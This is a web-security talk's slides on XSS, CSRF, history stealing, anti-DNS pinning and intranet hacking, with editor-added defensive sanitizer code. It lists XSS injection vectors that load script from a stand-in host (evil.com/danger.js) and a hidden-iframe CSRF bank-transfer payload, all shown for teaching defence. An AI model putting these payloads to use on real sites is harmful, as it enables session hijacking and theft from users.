Rich Web App Security
Keeping your application safe

Jeremiah Grossman, Founder and CTO, WhiteHat Security
Joe Walker, DWR Developer, Getahead

5 Stages of Web Application Security Grief
  Denial
  Anger
  Bargaining
  Depression
  Acceptance

Network security solutions don't work for web application security

[Diagram: Telnet, FTP and POP alongside http(s), in front of the Web Servers, App Servers and Database]

8 out of 10 Websites are Vulnerable

The Victims

The companies that host the Applications
The users that use the Applications

Building Blocks: XSS

XSS = Cross Site Scripting

You are at risk of an XSS attack any time you allow scripts from someone untrusted into pages from your domain.

Building Blocks: XSS

You let the user enter their name.
Someone is going to enter their name like this:
  Joe<script src="evil.com/danger.js">

Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe.

Making User Input Safe

You filter out ‘<script.*>’ and then you’re safe. Right?

Making User Input Safe

Actually you also need to filter:
  <a href='javascript:danger();'>

  <body onload='danger();'>

  <p style='background-image: url("javascript:danger();")'>

  <img src='javascript:danger()'/>

Making User Input Safe

And don’t forget:
  <body background="javascript:danger()">

  <link rel="stylesheet" href="javascript:danger()"/>

  <style>@import evil.com/danger.js</style>

  <input type='image' src='javascript:danger()'/>

Making User Input Safe

And then there’s:
  <iframe src='evil.com/danger.html'/>

  <meta http-equiv="refresh" content="0;url=javascript:danger()">

  <base href="javascript:danger()">

  <frameset>
      <frame src="javascript:danger()">...

Making User Input Safe

But remember:
  <table background="javascript:danger()">

  <tr background="javascript:danger()">

  <div style="width:expression(danger();)">

  <object type="text/x-scriptlet" data="evil.com/danger.js">

Making User Input Safe

It’s made 1000 times worse by browsers being able to make sense of virtually anything. Each of these:
  <a href="a.html" link</a>

  <a href="a.html">link

  <a href="a.html >link</a>

  ¼a href="a.html"¾link¼/a¾   (depending on some encoding tricks)

makes perfect sense to a browser.

Making User Input Safe

And we haven’t got into:
  • Flash (ActionScript ~= JavaScript)
  • SVG (can embed JavaScript)
  • .htc (packaged HTML in IE)
  • XML Data Islands (IE only)
  • HTML+TIME
You can use both <object> and <embed> for many of these.

Building Blocks: CSRF

CSRF = Cross Site Request Forgery

You are at risk of a CSRF attack whenever you assume that a request containing an authentication header (e.g. cookies) is something the user intended.

Building Blocks: CSRF

bank.com:
  Welcome Fred,
  Thank-you for logging in

evil.com:
  <iframe width=0 height=0
    src="http://bank.com/transfer.cgi?amnt=all&dest=MrEvil"/>

Building Blocks: CSRF

JavaScript is not always required to exploit a CSRF hole. Often all you need is:
  <iframe src="dangerous_url">
  or <img src="dangerous_url"/>
  or <script src="dangerous_url">

You can’t use XHR because cross-domain rules prevent the request from being sent.

Attacks only get more Effective

70 new attack techniques in 2006.
Many are small, but they combine in worrying ways.
Jeremiah’s Top 10:
  http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html
The 6 most important ...

6. Hacking RSS Readers

RSS Feeds  →  Aggregators generally change the domain  →  Users get the result

Hacking RSS and Atom Feed Implementations
http://www.cgisecurity.com/papers/HackingFeeds.pdf

5. Web Worms

If your site isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts.

XHR/Flash/Quicktime can be used as a vector.
Web worms grow much faster than email worms.
So far, infections have been mostly benign, like how email worms were in the early 90’s ...
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf

4. Backdooring Media Files

Many media types are scriptable by design:

Some are ‘scriptable’ by buffer-overflow:

If you are allowing users to upload files, be afraid.

JavaScript Malware embedded in everything
http://jeremiahgrossman.blogspot.com/2006/09/javascript-malware-embedded-in.html

3. History Stealing - Part 1

I want to know if you visit dodgy.com.
I create a page with a link and use a script to read the CSS link color: purple: guilty, blue: not guilty.
A page can quickly check thousands of sites.
http://ha.ckers.org/weird/CSS-history-hack.html

3. History Stealing - Part 2

Point a script tag at a protected HTML resource, and detect differing replies by their differing error messages:
  <script src="http://mail.google.com/mail">

http://ha.ckers.org/weird/javascript-website-login-checker.html

2. Anti-DNS Pinning

The basic attack:
A browser visits evil.com. The DNS lookup gives the real web server address.
1 second later, the evil.com page creates an iframe pointing at evil.com, and the evil.com server drops the HTTP request.
The DNS pin is dropped, so the browser needs to look up DNS again.
This time it gets someone else’s address.
The browser reads from the other site, but thinks it is the same domain.

2. Anti-DNS Pinning

As it is, the attack isn’t very useful because:
• The browser thinks the domain is evil.com, so cookies for innocent.com are not sent; cookie-protected resources are safe (for now)
• But it’s great for Intranet hacking - no cookies are needed to read from 192.168.0.1 or 127.0.0.1

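The server-side check that blunts this attack, as an added example the slides do not give: after the re-lookup the browser still sends "Host: evil.com", so a server that only answers for the hostnames it actually serves returns an error instead of its content. The hostnames and function names are constructed for this example (Node.js, no dependencies); 421 Misdirected Request is the HTTP status defined for exactly this case.

```javascript
// Hostnames this server is willing to answer for (constructed for the example).
const SERVED_HOSTS = new Set(['intranet.example', 'www.intranet.example']);

// True only when the Host header names a host this server serves. An optional
// port is allowed; a missing, malformed, or foreign Host (such as "evil.com" or
// a bare IP address the server was never configured for) is refused.
function hostIsServed(hostHeader) {
  if (typeof hostHeader !== 'string') return false;
  const m = /^(\[[^\]]*\]|[^:\/\s]+)(?::\d+)?$/.exec(hostHeader.trim());
  return m !== null && SERVED_HOSTS.has(m[1].toLowerCase());
}

// Decides a request before any content is produced: returns the HTTP status to
// send, or null to let the request through. `req` only needs req.headers.host.
function misdirectedStatus(req) {
  return hostIsServed(req.headers && req.headers.host) ? null : 421;
}
```

In a Node `http` handler the check runs first and, on 421, the response carries no application content at all.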
1. Intranet Hacking

History stealing to enumerate hosts inside the firewall.
Anti-DNS pinning to read HTML from inside.
Many routers / firewalls / etc. have default passwords, which an attacker can exploit.
Use CSRF to alter router / firewall settings.
http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf

Fixing XSS (when HTML is Illegal)

1. Filter inputs by white-listing input characters
   Remember to filter header names and values
2. Filter outputs for the display environment
   For HTML:
     &  →  &amp;
     <  →  &lt;
     >  →  &gt;
     '  →  &apos;
     "  →  &quot;
   Other environments have other special chars

Fixing XSS (when HTML is Legal, and Well Formed)

1. Filter inputs as before
2. Swap characters for entities (as before)
3. Swap back a whitelist of allowed tags, e.g.:
     &lt;strong&gt;  →  <strong>
4. Take extra care over attributes:
     s/&lt;a href=&quot;([^&]*)&quot;&gt;/<a href="$1">/
5. Don’t use regular expressions

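A worked version of the two "Fixing XSS" recipes above (encode for the HTML environment, then swap back an allowlist with care over href), run side by side with the "<script.*>" blacklist from the "Right?" slide against the vectors listed earlier. This is an added example, not code from the talk; the function names and the tag allowlist are its own choices, and it is written for Node.js.

```javascript
// The blacklist from the "Right?" slide: it strips <script ...> and nothing else.
function naiveScriptFilter(input) {
  return input.replace(/<script.*>/gi, '');
}

// Step 2: encode every character that has meaning in HTML. '&#39;' is used rather
// than '&apos;', which is an XML entity that HTML 4 browsers do not define.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);

// Step 4: an href is accepted only if it is relative or http(s). Whitespace and
// control characters are removed first, because browsers ignore them inside a
// scheme, so "java\tscript:" has to be judged as "javascript:".
const isSafeHref = (h) => {
  const c = h.replace(/[\x00-\x20]/g, '').toLowerCase();
  return !/^[a-z][a-z0-9+.-]*:/.test(c) || /^https?:/.test(c);
};

// Steps 3 and 4: after encoding, swap back exactly the tags on the allowlist.
// Simple tags are matched as exact strings. For links the whole
// &lt;a href=&quot;...&quot;&gt;...&lt;/a&gt; unit is matched, so a link is only
// ever put back complete and with a checked href. The capture "[^&]*" cannot
// cross the closing quote or pick up a second attribute, because every '&', '"',
// '<' and '>' in the encoded text now starts with '&'. It also means an href that
// contains '&' stays encoded: that limitation is why the slide ends with step 5.
const SIMPLE_TAGS = ['strong', 'em', 'p', 'br'];

function sanitizeWellFormed(input) {
  let out = escapeHtml(input);
  for (const tag of SIMPLE_TAGS) {
    out = out.split('&lt;' + tag + '&gt;').join('<' + tag + '>');
    out = out.split('&lt;/' + tag + '&gt;').join('</' + tag + '>');
  }
  out = out.replace(/&lt;a href=&quot;([^&]*)&quot;&gt;([\s\S]*?)&lt;\/a&gt;/g,
    (whole, href, text) => (isSafeHref(href) ? `<a href="${href}">${text}</a>` : whole));
  return out;
}

// Constructed samples, taken from the vectors the earlier slides list, plus one
// piece of legitimate markup that should survive.
const SAMPLES = [
  'Joe<script src="evil.com/danger.js">',
  "<a href='javascript:danger();'>x</a>",
  "<body onload='danger();'>",
  "<img src='javascript:danger()'/>",
  '<a href="java\tscript:danger()">x</a>',
  '<a href="a.html">link</a> and <strong>bold</strong>',
];

// True when a string still contains raw markup a browser would act on.
const hasRawMarkup = (s) => /<[a-z\/]/i.test(s);

// Runs every sample through both treatments. The blacklist only ever catches the
// first sample; the encode-and-swap-back output contains raw markup only where
// an allowlisted tag was deliberately put back.
function compareTreatments(samples = SAMPLES) {
  return samples.map((input) => ({
    input,
    blacklistLeaks: hasRawMarkup(naiveScriptFilter(input)),
    sanitized: sanitizeWellFormed(input),
  }));
}
```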
Fixing XSS (when HTML is Legal, and NOT Well Formed)

1. Find another way to do it / Swap jobs / Find some other solution to the problem
2. Create a tag soup parser to create a DOM tree from a badly formed HTML document
   Remember to recursively check encodings
3. Create a tree walker that removes all non-approved elements and attributes

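Steps 2 and 3 as an added example (not the talk's code): a tolerant tag-soup parser that builds a tree from the broken markup shown earlier, and a tree walker that re-serialises only an allowlist of elements and attributes with every text node entity-encoded. The allowlists and function names are this example's own; it assumes the input has already been decoded to a JavaScript string, so the "recursively check encodings" step happens before it. Node.js, no dependencies.

```javascript
// Element allowlist, with the attributes each element may keep (example's own).
const ALLOWED = { p: [], strong: [], em: [], br: [], a: ['href'] };
const URL_ATTRS = new Set(['href']);
// Elements that never have content: an unclosed one must not swallow what follows.
const VOID = new Set(['br', 'img', 'input', 'link', 'meta', 'base', 'frame']);
// Disallowed elements whose content is dropped with them; any other disallowed
// element loses only its tag and keeps its (encoded) children.
const DROP_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed', 'frameset']);
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
// URL attributes may be relative or http(s). Whitespace and control characters
// are stripped first because browsers ignore them inside "java\tscript:".
const isSafeUrl = (u) => {
  const c = u.replace(/[\x00-\x20]/g, '').toLowerCase();
  return !/^[a-z][a-z0-9+.-]*:/.test(c) || /^https?:/.test(c);
};
// Tokenizer. A tag starts at '<' followed by a letter or '/' and runs to the first
// '>' outside quotes, or to end of input if never closed; a bare '<' is text.
// This is what lets <a href="a.html >link</a> be parsed at all.
function tokenize(html) {
  const tokens = [];
  let i = 0;
  while (i < html.length) {
    const lt = html.indexOf('<', i);
    if (lt === -1 || !/[a-z\/]/i.test(html[lt + 1] || '')) {
      const end = lt === -1 ? html.length : lt + 1;
      tokens.push({ type: 'text', data: html.slice(i, end) });
      i = end;
      continue;
    }
    if (lt > i) tokens.push({ type: 'text', data: html.slice(i, lt) });
    let j = lt + 1, quote = null;
    for (; j < html.length; j++) {
      const ch = html[j];
      if (quote) { if (ch === quote) quote = null; }
      else if (ch === '"' || ch === "'") quote = ch;
      else if (ch === '>') break;
    }
    tokens.push({ type: 'tag', data: html.slice(lt + 1, j) });
    i = j + 1;
  }
  return tokens;
}
// Parses a tag body such as `a href='x' onclick=y` or `/a`. A value whose closing
// quote is missing runs to the end of the tag, as it does in a browser.
function parseTag(body) {
  const m = /^\/?([a-z][a-z0-9]*)/i.exec(body);
  if (!m) return null;
  const tag = { name: m[1].toLowerCase(), closing: body.startsWith('/'),
                selfClosing: /\/\s*$/.test(body), attrs: {} };
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"?|'([^']*)'?|([^\s"'>]+)))?/g;
  re.lastIndex = m[0].length;
  for (let a; (a = re.exec(body)) !== null;) {
    const v = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4];
    tag.attrs[a[1].toLowerCase()] = v === undefined ? '' : v;
  }
  return tag;
}
// Builds the tree. Unmatched end tags are ignored; elements still open at end of
// input are closed there, which is how a browser renders <a href="a.html">link.
function parse(html) {
  const root = { name: '#root', attrs: {}, children: [] };
  const stack = [root];
  for (const tok of tokenize(html)) {
    const parent = stack[stack.length - 1];
    if (tok.type === 'text') { parent.children.push({ text: tok.data }); continue; }
    const tag = parseTag(tok.data);
    if (!tag) { parent.children.push({ text: '<' + tok.data + '>' }); continue; }
    if (tag.closing) {
      const idx = stack.map((n) => n.name).lastIndexOf(tag.name);
      if (idx > 0) stack.length = idx; // pops it and everything opened inside it
      continue;
    }
    const el = { name: tag.name, attrs: tag.attrs, children: [] };
    parent.children.push(el);
    if (!VOID.has(tag.name) && !tag.selfClosing) stack.push(el);
  }
  return root;
}
// Tree walker: approved elements only, approved attributes only, URL attributes
// only when isSafeUrl passes, and every text node entity-encoded.
function serialize(node) {
  if (node.text !== undefined) return escapeHtml(node.text);
  const inner = () => node.children.map(serialize).join('');
  if (node.name === '#root') return inner();
  if (DROP_CONTENT.has(node.name)) return '';
  const allowedAttrs = ALLOWED[node.name];
  if (!allowedAttrs) return inner();
  let out = '<' + node.name;
  for (const name of allowedAttrs) {
    const value = node.attrs[name];
    if (value === undefined || (URL_ATTRS.has(name) && !isSafeUrl(value))) continue;
    out += ' ' + name + '="' + escapeHtml(value) + '"';
  }
  return VOID.has(node.name) ? out + '>' : out + '>' + inner() + '</' + node.name + '>';
}
function sanitizeTagSoup(html) { return serialize(parse(html)); }
```

Because the walker rebuilds the markup from the tree, the three malformed links from the earlier slide come out as well-formed links, and nothing the browser would have "made sense of" survives unless it was explicitly approved.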
Fixing CSRF

Force users to log off.
Checking referrer headers doesn’t make things safe, but it does slow attackers down.
Include authentication tokens in the body:
  OWASP servlet filter
  Double-submit cookie pattern

Security Corner: Cross-Site Request Forgeries
http://shiflett.org/articles/cross-site-request-forgeries

Questions?

Joe Walker            http://getahead.org/blog/joe
Jeremiah Grossman     http://www.whitehatsec.com/

 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dashnarutouzumaki53779
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 

Recently uploaded (20)

Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 

Rich Web App Security - Keeping your application safe

  • 1. Rich Web App Security: Keeping your application safe. Jeremiah Grossman, Founder and CTO, WhiteHat Security; Joe Walker, DWR Developer, Getahead 1
  • 2. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 2
  • 3. Network security solutions don't work for web application security (diagram labels: Telnet, FTP, POP, http(s); Web Servers, App Servers, Database) 3
  • 4. 8 out of 10 Websites are Vulnerable 4
  • 5. The Victims The companies that host the Applications The users that use the Applications 5
  • 6. Building Blocks: XSS XSS = Cross Site Scripting You are at risk of an XSS attack any time you allow scripts from someone untrusted into pages from your domain 6
  • 7. Building Blocks: XSS You let the user enter their name Someone is going to enter their name like this: Joe<script src="evil.com/danger.js"> Then, whoever looks at Joe’s name will execute Joe’s script and become a slave of Joe 7
  • 8. Making User Input Safe You filter out ‘<script.*>’ and then you’re safe. Right? 8
  • 9. Making User Input Safe Actually you also need to filter: <a href='javascript:danger();'> <body onload='danger();'> <p style='background-image: url("javascript:danger();")'); <img src='javascript:danger()'/> 9
  • 10. Making User Input Safe And don’t forget: <body background="javascript:danger()"> <link rel="stylesheet" href="javascript:danger()"/> <style>@import evil.com/danger.js</style> <input type='image' src='javascript:danger()'/> 10
  • 11. Making User Input Safe And then there’s: <iframe src='evil.com/danger.html'/> <meta http-equiv="refresh" content="0;url=javascript:danger()"> <base href="javascript:danger()"> <frameset> <frame src="javascript:danger()">... 11
  • 12. Making User Input Safe But remember: <table background="javascript:danger()"> <tr background="javascript:danger()"> <div style="width:expression(danger();)"> <object type="text/x-scriptlet" data="evil.com/danger.js"> 12
  • 13. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 13
  • 14. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html" link</a> makes perfect sense to a browser. 14
  • 15. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html">link makes perfect sense to a browser. 15
  • 16. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: <a href="a.html >link</a> makes perfect sense to a browser. 16
  • 17. Making User Input Safe It’s made 1000 times worse by browsers being able to make sense of virtually anything. This: (depending on some encoding tricks) ¼a href="a.html"¾link¼/a¾ makes perfect sense to a browser. 17
  • 18. Making User Input Safe And we haven’t got into: • Flash (ActionScript ~= JavaScript) • SVG (can embed JavaScript) • .htc (packaged HTML in IE) • XML Data Islands (IE only) • HTML+TIME You can use both <object> and <embed> for many of these 18
  • 19. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 19
  • 20. Building Blocks: CSRF CSRF = Cross Site Request Forgery You are at risk of a CSRF attack whenever you assume that a request containing an authentication header (e.g. cookies) is something the user intended 20
  • 21. Building Blocks: CSRF (diagram: bank.com shows "Welcome Fred, Thank-you for logging in"; evil.com contains <iframe width=0 height=0 src="http://bank.com/transfer.cgi?amnt=all&dest=MrEvil"/>) 21
  • 22. Building Blocks: CSRF JavaScript is not always required to exploit a CSRF hole Often all you need is: <iframe src="dangerous_url"> or <img src="dangerous_url"/> or <script src="dangerous_url"> You can’t use XHR because cross-domain rules prevent the request from being sent 22
  • 23. Attacks only get more Effective 70 new attack techniques in 2006 Many are small, but they combine in worrying ways Jeremiah’s Top 10: http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html The 6 most important ... 23
  • 24. 6. Hacking RSS Readers (diagram: users get RSS feeds; aggregators generally change the domain of the result) Hacking RSS and Atom Feed Implementations http://www.cgisecurity.com/papers/HackingFeeds.pdf 24
  • 25. 5. Web Worms If your site isn’t 100% safe against XSS and CSRF, users can attack their ‘friends’ with scripts XHR/Flash/Quicktime can be used as a vector Web worms grow much faster than email worms So far, infections have been mostly benign, like how email worms were in the early 90’s ... http://www.whitehatsec.com/downloads/WHXSSThreats.pdf 25
  • 26. 4. Backdooring Media Files Many media types are scriptable by design: Some are ‘scriptable’ by buffer-overflow: If you are allowing users to upload files, be afraid. JavaScript Malware embedded in everything http://jeremiahgrossman.blogspot.com/2006/09/javascript-malware-embedded-in.html 26
  • 27. 3. History Stealing - Part 1 I want to know if you visit dodgy.com I create a page with a link and use a script to read the CSS link color: purple:guilty, blue:not guilty A page can quickly check thousands of sites http://ha.ckers.org/weird/CSS-history-hack.html 27
  • 28. 3. History Stealing - Part 2 Point a script tag at a protected HTML resource, detect differing replies by differing error messages <script src="http://mail.google.com/mail"> http://ha.ckers.org/weird/javascript-website-login-checker.html 28
  • 29. 2. Anti-DNS Pinning The basic attack: A browser visits evil.com. The DNS lookup gives the real web-server address. 1 second later evil.com creates an iframe to evil.com and drops the HTTP request The DNS pin is dropped, the browser needs to look up DNS again. This time it gets someone else’s address. The browser reads from the other site, but thinks it is the same domain. 29
  • 30. 2. Anti-DNS Pinning As it is the attack isn’t very useful because: • The browser thinks the domain is evil.com, so cookies for innocent.com are not sent, cookie protected resources are safe (for now) • But it’s great for Intranet hacking - no cookies are needed to read from 192.168.0.1 or 127.0.0.1 30
  • 31. 1. Intranet Hacking History stealing to enumerate hosts inside the firewall Anti-DNS pinning to read HTML from inside Many routers / firewalls / etc have default passwords, which an attacker can exploit Use CSRF to alter router / firewall settings http://www.whitehatsec.com/home/resources/presentations/files/javascript_malware.pdf 31
  • 32. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 32
  • 33. Fixing XSS (when HTML is Illegal) 1. Filter inputs by white-listing input characters. Remember to filter header names and values. 2. Filter outputs for the display environment. For HTML: & → &amp;, < → &lt;, > → &gt;, ' → &apos;, " → &quot;. Other environments have other special chars 33
  • 34. Fixing XSS (when HTML is Legal, and Well Formed) 1. Filter inputs as before 2. Swap characters for entities (as before) 3. Swap back a whitelist of allowed tags, e.g. &lt;strong&gt; → <strong> 4. Take extra care over attributes: s/&lt;a href=&quot;([^&]*)&quot;&gt;/<a href="$1">/ 5. Don’t use regular expressions 34
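Slides 33 and 34 worked through as an added example (the editor's code, not DWR's or WhiteHat's): the untrusted string is entity-encoded first, then only a whitelist of tags and an <a> whose href parses as http(s) are swapped back. The function names and the whitelist are assumptions; the swap-back regex only ever runs over already-encoded text, so anything it fails to match stays encoded rather than live, which is what makes the ordering safe even for the malformed markup of slides 14 to 17.

```javascript
// Added example, not from the slides. Names here are the editor's own.

// Slide 33: the five HTML special characters become entities.
// &#39; is used instead of &apos; because &apos; is not defined in HTML 4.
function encodeForHtml(untrusted) {
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Tags allowed back, without attributes (assumed whitelist).
const SAFE_TAGS = ['strong', 'em', 'p', 'br'];

// Slide 34 step 3: &lt;strong&gt; -> <strong>, &lt;/strong&gt; -> </strong>.
function restoreSafeTags(encoded) {
  let out = encoded;
  for (const tag of SAFE_TAGS) {
    const open = new RegExp('&lt;' + tag + '&gt;', 'g');
    const close = new RegExp('&lt;/' + tag + '&gt;', 'g');
    out = out.replace(open, '<' + tag + '>').replace(close, '</' + tag + '>');
  }
  return out;
}

// Slide 34 step 4: an <a> is only restored when its href is an absolute
// http(s) URL. The URL parser decides, so "javascript:", "data:" and
// relative forms are all left entity-encoded and therefore inert.
function restoreSafeLinks(encoded) {
  const linkRe = /&lt;a href=&quot;([^&]*)&quot;&gt;(.*?)&lt;\/a&gt;/g;
  return encoded.replace(linkRe, (whole, href, text) => {
    let parsed;
    try { parsed = new URL(href); } catch (e) { return whole; }
    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return whole;
    // href came from user input, so it is re-encoded before it goes back
    // into an attribute; the link text is still encoded from the first step.
    return '<a href="' + encodeForHtml(parsed.href) + '">' + text + '</a>';
  });
}

// Encode everything, then swap back only what the whitelist allows.
function sanitizeLimitedHtml(untrusted) {
  return restoreSafeLinks(restoreSafeTags(encodeForHtml(untrusted)));
}
```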
  • 35. Fixing XSS (when HTML is Legal, and NOT Well Formed) 1. Find another way to do it / Swap jobs / Find some other solution to the problem 2. Create a tag soup parser to create a DOM tree from a badly formed HTML document Remember to recursively check encodings 3. Create a tree walker that removes all non approved elements and attributes 35
  • 36. Fixing CSRF Force users to log off Checking referrer headers doesn’t make things safe, but it does slow attackers down Include authentication tokens in the body OWASP servlet filter Double-submit cookie pattern Security Corner: Cross-Site Request Forgeries http://shiflett.org/articles/cross-site-request-forgeries 36
  • 37. 5 Stages of Web Application Security Grief Denial Anger Bargaining Depression Acceptance 37
  • 38. Questions? Joe Walker http://getahead.org/blog/joe Jeremiah Grossman http://www.whitehatsec.com/ 38